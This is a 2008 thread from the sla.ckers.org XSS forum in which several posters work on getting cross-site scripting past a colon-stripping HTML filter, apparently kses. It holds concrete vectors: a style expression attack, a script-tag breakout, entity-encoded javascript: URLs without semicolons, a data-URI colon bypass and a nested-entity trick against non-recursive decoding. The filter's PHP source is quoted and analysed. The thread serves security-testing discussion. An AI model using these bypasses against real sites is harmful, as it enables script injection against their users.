Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Unusual filter (colon?)
Posted by: asilvermtzion
Date: June 24, 2008 02:17PM

im trying to find vulns in an app, and they are filtering all colons (:) in the html , is that really a safe method? havent seen that used before. ive tried all obvious methods of encoding to try and get round that, but even all the crazy vectors on here dont work unless you have a : available!

Many thanks

Options: ReplyQuote
Re: Unusual filter (colon?)
Posted by: Matt Presson
Date: June 24, 2008 02:28PM

I have found sometimes that if you use the encoding (html mostly) inside of a CSS style exploit then the encoding works. I use it with the style="javascript:expression(alert(1))" style attacks. Seems to work wonders, although that particular attack will only affect IE browsers as expression() is an IE only function.

-----------------------------------------------------------------------
(ú=(θ='',[µ=!(Φ=!θ+{})+θ,Θ=Φ[ø=+!θ]+Φ[+θ],ĩ=µ[ø],Ø=µ[º=ø+++ø],Ç=Φ[º+ø],à=ú[Φ[º+º]+Φ[+θ]+Ç+ĩ]][Ø+Ç+Θ])())[ĩ+à('•êí')](Ç+à('Á«)'))

Options: ReplyQuote
Re: Unusual filter (colon?)
Posted by: thornmaker
Date: June 27, 2008 12:02PM

A few more details would be helpful. Are you trying XSS? If so, why not just go with the old and trusty
 "><script>alert(0)</script>

SQL injection? colons should not be an issue.

Are other characters filtered as well? If so, this could change your options quite a bit.

Options: ReplyQuote
Re: Unusual filter (colon?)
Posted by: Gareth Heyes
Date: June 27, 2008 12:27PM

<iframe/src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41>


I still don't know why we get these questions, there's a tool that does it all for you....
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PGlmcmFtZS9zcmM9PEBkZWNfZW50XzAoKT5qYXZhc2NyaXB0OmFsZXJ0KDEpPEAvZGVjX2VudF8wPj4%3D

Hackvertor power!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Unusual filter (colon?)
Posted by: asilvermtzion
Date: June 29, 2008 08:19AM

Thanks lol, well the filtering is actually very good on the app im testing, they decode all dec/hex entities in the sanitisation routine

e.g.

###############################################################################
# This function decodes numeric HTML entities (&#65; and &#x41;). It doesn't
# do anything with other entities like &auml;, but we don't need them in the
# URL protocol whitelisting system anyway.
###############################################################################
{
  $string = preg_replace('/&#([0-9]+);/e', 'chr("\\1")', $string);
  $string = preg_replace('/&#[Xx]([0-9A-Fa-f]+);/e', 'chr(hexdec("\\1"))',
                         $string);

  return $string;
}

This rules out any use of encoding to beat the filter, as well as using htmlspecialchars etc. to prevent unwanted tags and protocols.

so im wondering if there is maybe any other methods for sneaking a vector in to an href or img src attribute, which doesnt use quotes or numeric entities. im guessing thats impossible though...

Options: ReplyQuote
Re: Unusual filter (colon?)
Posted by: Gareth Heyes
Date: June 29, 2008 08:48AM

@asilvermtzion

That regular expression doesn't take into account malformed entities. The vector above doesn't use semi-colons.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Unusual filter (colon?)
Posted by: asilvermtzion
Date: June 29, 2008 09:59AM

htmlspecialchars replaces ampersands, therefore how can you use malformed entities, this sanitisation routine seems to filter out legit entities and if its not recognised it just reverts to regular filtering i.e. if i try an entity such as &#x5c2d it doesnt get through...(entity normalisation)

that vector still uses the "javascript:" protocol which this code detects as an unwanted protocol and just fishes it out leaving just "alert(1)" or whatever.

maybe im missing something obvious here

i was also reading your protocol fuzzing stuff which is amazing but it still always uses ":" meaning this code filters it out:

###############################################################################
# This function searches for URL protocols at the beginning of $string, while
# handling whitespace and HTML entities.
###############################################################################
{
  return preg_replace('/^((&[^;]*;|[\sA-Za-z0-9])*)'.
                      '(:|&#58;|&#[Xx]3[Aa];)\s*/e',
                      'wp_kses_bad_protocol_once2("\\1", $allowed_protocols)',
                      $string);
}



Edited 3 time(s). Last edit at 06/29/2008 12:20PM by asilvermtzion.

Options: ReplyQuote
Re: Unusual filter (colon?)
Posted by: Gareth Heyes
Date: June 29, 2008 01:17PM

@asilvermtzion

The first one you posted would not have protected against malformed entities, I was unaware that the site normalised entities. If you explain where the code is injected and what the output page looks like it may help get a vector.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Unusual filter (colon?)
Posted by: asilvermtzion
Date: June 29, 2008 04:05PM

Yeh my bad, I should have given more info. Upon reflection, its using http://sourceforge.net/projects/kses which is a discontinued html purifier, some vulns are available but they have been patched in this implementation (style attributes disabled as well).

So I guess this is just pissing in the wind as all angles appear to be covered, but I'm still trying to get a vector to work with it, just for the challenge aspect of beating some reasonably strict regex....ive tried all manner of encodings, null bytes, variable width encoding vectors etc. but I'm having no luck. :3

Options: ReplyQuote
Re: Unusual filter (colon?)
Posted by: Gareth Heyes
Date: June 29, 2008 04:50PM

Seems to get round it, you could either add a base64 encoding or plain payload
<a href="data&#x00003atext/html,">test</a>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Unusual filter (colon?)
Posted by: kuza55
Date: June 29, 2008 06:51PM

asilvermtzion Wrote:
-------------------------------------------------------
> Thanks lol, well the filtering is actually very
> good on the app im testing, they decode all
> dec/hex entities in the sanitisation routine
>
> e.g.
>
> ##################################################
> #############################
> # This function decodes numeric HTML entities
> (&#65; and &#x41;). It doesn't
> # do anything with other entities like &auml;, but
> we don't need them in the
> # URL protocol whitelisting system anyway.
> ##################################################
> #############################
> {
> $string = preg_replace('/&#([0-9]+);/e',
> 'chr("\\1")', $string);
> $string = preg_replace('/&#([0-9A-Fa-f]+);/e',
> 'chr(hexdec("\\1"))',
> $string);
>
> return $string;
> }
>
> This rules out any use of encoding to beat the
> filter, as well as using htmlspecialchars etc. to
> prevent unwanted tags and protocols.
>
> so im wondering if there is maybe any other
> methods for sneaking a vector in to an href or img
> src attribute, which doesnt use quotes or numeric
> entities. im guessing thats impossible though...


Non-recursive filtering FTL:
<?php

$string = "&#&#53;8;";

  $string = preg_replace('/&#([0-9]+);/e', 'chr("\\1")', $string);
  $string = preg_replace('/&#[Xx]([0-9A-Fa-f]+);/e', 'chr(hexdec("\\1"))',
                         $string);

print $string;
?>

P.S. Filtering is bad, you rejecting dodgy input is better. That way you don't get caught up in your own code.

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Options: ReplyQuote
Re: Unusual filter (colon?)
Posted by: asilvermtzion
Date: June 30, 2008 06:32AM

Hi Gareth, I'm just getting that filtered to:

<a href="data&amp;#x00003atext/html,">test</a>

Looking at the code some more, seems to be some extra regex outside of the html filter:

$text = str_replace('&&', '&#038;&', $text);
$text = str_replace('&&', '&#038;&', $text);
$text = preg_replace('/&(?:$|([^#])(?![a-z1-4]{1,8};))/', '&#038;$1', $text);

Also this in the filter:

Disarm all entities by converting & to &amp;

$string = str_replace('&', '&amp;', $string);

i guess it doesnt change the #x3a back because its not an accepted entity

kuza55, very nice idea...although it doesnt seem to actually replace:
<a href="javascript&amp;#&#53;8;alert(1),">test</a>

I dont understand why, I think because the way the protocol filtering works means its not actually getting to the decoding stage.

<?php

function wp_kses_normalize_entities2($i)
###############################################################################
# This function helps wp_kses_normalize_entities() to only accept 16 bit values
# and nothing more for &#number; entities.
###############################################################################
{
  return (($i > 65535) ? "&amp;#$i;" : "&#$i;");
} # function wp_kses_normalize_entities2

$string = "&#&#53;8;";

$string = str_replace('&', '&amp;', $string);

# Change back the allowed entities in our entity whitelist

  $string = preg_replace('/&amp;([A-Za-z][A-Za-z0-9]{0,19});/',
                         '&\\1;', $string);
  $string = preg_replace('/&amp;#0*([0-9]{1,5});/e',
                         'wp_kses_normalize_entities2("\\1")', $string);
  $string = preg_replace('/&amp;#([Xx])0*(([0-9A-Fa-f]{2}){1,2});/',
                         '&#\\1\\2;', $string);

/*
  $string = preg_replace('/&#([0-9]+);/e', 'chr("\\1")', $string);
  $string = preg_replace('/&#[Xx]([0-9A-Fa-f]+);/e', 'chr(hexdec("\\1"))',
                         $string);
*/

print $string;
?>

If you run that test with the bits I've commented out then you see the same result I got.

I think it might be doable if you can trick the code into testing a protocol and leaving the malicious protocol behind, this is the code that does that:

function wp_kses_bad_protocol($string, $allowed_protocols)
###############################################################################
# This function removes all non-allowed protocols from the beginning of
# $string. It ignores whitespace and the case of the letters, and it does
# understand HTML entities. It does its work in a while loop, so it won't be
# fooled by a string like "javascript:javascript:alert(57)".
###############################################################################
{
  $string = wp_kses_no_null($string);
  $string2 = $string.'a';

  while ($string != $string2)
  {
    $string2 = $string;
    $string = wp_kses_bad_protocol_once($string, $allowed_protocols);
  } # while

  return $string;
}

Options: ReplyQuote


Sorry, only registered users may post in this forum.